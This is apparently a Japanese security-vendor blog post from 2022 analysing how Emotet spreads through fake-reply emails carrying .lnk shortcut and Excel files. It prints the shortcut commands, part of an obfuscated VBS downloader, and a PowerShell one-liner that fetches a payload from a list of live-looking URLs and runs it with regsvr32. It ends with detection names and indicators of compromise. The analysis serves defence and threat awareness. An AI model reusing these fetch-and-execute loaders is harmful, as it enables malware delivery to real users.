Posted By Hansoyoung , 2022年 May 20日

様々なファイルを通じて拡散する Emotet マルウェア

ASEC 分析チームは最近、Emotet マルウェアがリンクファイル(.lnk)を通じて拡散していることを確認した。Emotet マルウェアは過去から何度も拡散が続いており、4月からは Emotet ダウンローダーが Excel ファイルだけではなく、リンクファイル(.lnk)も使用していることが確認された。

確保した EML ファイルは、すべてユーザーのメールに対する返信であるかのように装ってマルウェアを配布するという共通点が見られる。

[図1] メールに添付されている Excel ファイルの場合、以下のブログで共有したマクロシートを利用したタイプと同じ方式を使用している。

ダウンロード URL は以下の通りである。

hxxp://easiercommunications[.]com/wp-content/w/
hxxp://dulichdichvu[.]net/libraries/QhtrjCZymLp5EbqOdpKk/)
hxxps://www.whow[.]fr/wp-includes/H54Fgj0tG/)
hxxp://genccagdas[.]com.tr/assets/TTHOm833iNn3BxT/)
hxxp://heaventechnologies[.]com.pk/apitest/xdeAU0rx26LT9I/)
hxxp://goonboy[.]com/goonie/bSFz7Av/

Excel ファイルのほか lnk ファイルも多数が発見されており、大半が Invoice 関連のファイル名で拡散していることが確認されている。また、配布日付によって実行されるコマンドに違いがある。

確認日	拡散ファイル名
04/26	EXT Payment status.lnk
04/26	Past Due invoice.lnk
04/28	Electronic form.lnk
04/28	detalles_28042022.lnk
04/29	Address Changed.lnk
04/29	Change of Address.lnk
05/02	Payment with a new address.lnk
05/03	INF_15823367.lnk
05/03	MES_11845137690439733.lnk

表1. 確認された lnk ファイル名

Invoice # US-616121772.lnk

[図2]のメールに添付された Invoice # US-616121772.lnk ファイルの場合、開くと以下のコマンドが実行される。

cmd.exe /v:on /c findstr “glKmfOKnQLYKnNs.*” “Invoice # US-616121772.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

lnk ファイル下段には glKmfOKnQLYKnNs 文字列を始めとするスクリプトコードが存在するが、lnk ファイルを開くとこのコードを %TEMP% フォルダーの YlScZcZKeP.vbs ファイルに保存および実行する。

YlScZcZKeP.vbs ファイルは、内部に base64 でエンコードされた URL が存在し、この URL にアクセスしてさらなるマルウェアをダウンロードおよび実行する。

glKmfOKnQLYKnNs=1::on error resume next:Set FSO = CreateObject(“Scripting.FileSystemObject”)::Function Base64Decode(ByVal vCode): With CreateObject(“Msxml2.DOMDocument.3.0”).CreateElement(“base64”): .dataType = “bin.base64”: .text = vCode: Base64Decode = Stream_BinaryToString(.nodeTypedValue): End With:End Function::Function Stream_BinaryToString(Binary): With CreateObject(“ADODB.Stream”): .Type = 1: .Open: .Write Binary: .Position = 0: .Type = 2: .CharSet = “utf-8”: Stream_BinaryToString = .ReadText: End With:End Function::Dim LmPxinnpsd(6):::LmPxinnpsd(0) = “aHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2Iv”::LmPxinnpsd(1) = “aHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIv”::LmPxinnpsd(2) = “aHR0cDovL2RlbW8zNC5ja2cuaGsvc2VydmljZS9oaE1acmZDN01ubTlKRC8=”::LmPxinnpsd(3) = “aHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2Lw==”::LmPxinnpsd(4) = “aHR0cDovL2NpcHJvLm14L3ByZW5zYS9zaVpQNjlyQkZtaWJEdnVUUDFMLw==”::LmPxinnpsd(5) = “aHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8=”:::Execute(“dIm xml,Ws”&chr(-7328+7372)&”Db,FiLePaTH,u”&chr(6281-6199)&”L:”&chr(872280/7269)&”ml = “”MSXml2.SeRVERXmlht”&chr(-4790+4874)&”p.3″&chr(7943-7897)&”0″”:Ws = “”wscRipT.SHEll””:D”&chr(3908-3810)&” = “”aDo”&chr(-4831+4931)&”b.”&chr(7496-7413)&”TReam””:seT ImSHdnYd”&chr(-9735+9821)&”R =”&chr(-6409+6441)
<省略>

VBS コードの一部

ダウンロード URL は以下の通りである。

hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/
hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1L/
hxxp://colegiounamuno[.]es/cgi-bin/E/

以降、ダウンロードしたファイルを %TEMP% フォルダーに KzcEXkekpr.Zvp というファイル名で保存したあと、‘%wInDiR% \sySTem32\regsVR32.Exe %tmp% \KZcEXkEkpR.ZVP’コマンドを通じて実行する。

20220429_57092_005.lnk

[図3]のメールに添付されている 20220429_57092_005.lnk ファイルの場合、前述の lnk ファイルとは異なり、PowerShell コマンドを使用してさらなるファイルをダウンロードする。lnk ファイルを開くと以下の PowerShell コマンドを通じて Base64 でエンコードされたデータをデコードし、% TEMP% フォルダーに xLhSBgzPSx.ps1 で保存する。

C:\Windows\system32\cmd.exe /v:on /c fHjk4fTLlkc5DZfyorHstui9FxCd6xw3JieZWhdwrpiX+F4gEcRJCp5i1KXfjUxLJXU8QzW5||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c “&{[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(‘JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDo<中略>’)) > “%tmp%\xLhSBgzPSx.ps1”; powershell -executionpolicy bypass -file “$env:TEMP\xLhSBgzPSx.ps1”; Remove-Item -Force “$env:TEMP\xLhSBgzPSx.ps1″}”

実行コマンドの一部

$ProgressPreference="SilentlyContinue";$links=("hxxp://gccon.in/UploadedFiles/UYtJNrT2llxy1/","hxxp://gakudou.com/photo06/hEu/","hxxp://giasotti.com/js/Khc6mb0zx4KoWX/","hxxp://plresende.com/pcinfor/cq/","hxxp://thomasmanton.com/wp-includes/owZnpWmH4D8j/","hxxp://gla.ge/old/PuVaff/");foreach ($u in $links) {try {IWR $u -OutFile $env:TEMP/jnURxtRmiO.SKh;Regsvr32.exe $env:TEMP/jnURxtRmiO.SKh;break} catch { }}

ダウンロード URL は以下の通りである。

hxxp://gccon[.]in/UploadedFiles/UYtJNrT2llxy1/
hxxp://gakudou[.]com/photo06/hEu/
hxxp://giasotti[.]com/js/Khc6mb0zx4KoWX/
hxxp://plresende[.]com/pcinfor/cq/
hxxp://thomasmanton[.]com/wp-includes/owZnpWmH4D8j/
hxxp://gla[.]ge/old/PuVaff/

以降、ダウンロードしたファイルを %TEMP% フォルダーに jnURxtRmiO.SKh というファイル名で保存したあと、‘Regsvr32.exe $env:TEMP/jnURxtRmiO.SKh’コマンドを通じて実行する。

前述したダウンロード URL からは Emotet マルウェアがダウンロードされることが確認されている。Emotet マルウェアは、実行すると内部に存在する複数の C&C サーバアドレスに接続を試み、接続に成功すると攻撃者によるコマンドを受け取ってさらなるマルウェアダウンロード等の不正な振る舞いを実行することができる。

最近、emotet マルウェアが Excel ドキュメントだけでなく、様々なダウンローダーを通じて配布されているため、ユーザーの注意が必要である。

現在 AhnLab V3 製品は、当該ファイルに対して以下の通り検知している。

[ファイル検知]
Downloader/XLS.Emotet
LNK/Autorun.Gen
Trojan/LNK.Runner
Trojan/Win.Agent.R488899

[IOC]
c32c22fa90ad51747e9939f8e7abf4c0
fd37d5fecf99b16df331be14649ac09c
6e1da3039639bb9d40fc9d5d355062c2
c43d185691aaba7d1d196156a4a450f7
hxxp://easiercommunications[.]com/wp-content/w/
hxxp://dulichdichvu[.]net/libraries/QhtrjCZymLp5EbqOdpKk/)
hxxps://www.whow[.]fr/wp-includes/H54Fgj0tG/)
hxxp://genccagdas[.]com.tr/assets/TTHOm833iNn3BxT/)
hxxp://heaventechnologies[.]com.pk/apitest/xdeAU0rx26LT9I/)
hxxp://goonboy[.]com/goonie/bSFz7Av/
hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/
hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1L/
hxxp://colegiounamuno[.]es/cgi-bin/E/
hxxp://gccon[.]in/UploadedFiles/UYtJNrT2llxy1/
hxxp://gakudou[.]com/photo06/hEu/
hxxp://giasotti[.]com/js/Khc6mb0zx4KoWX/
hxxp://plresende[.]com/pcinfor/cq/
hxxp://thomasmanton[.]com/wp-includes/owZnpWmH4D8j/
hxxp://gla[.]ge/old/PuVaff/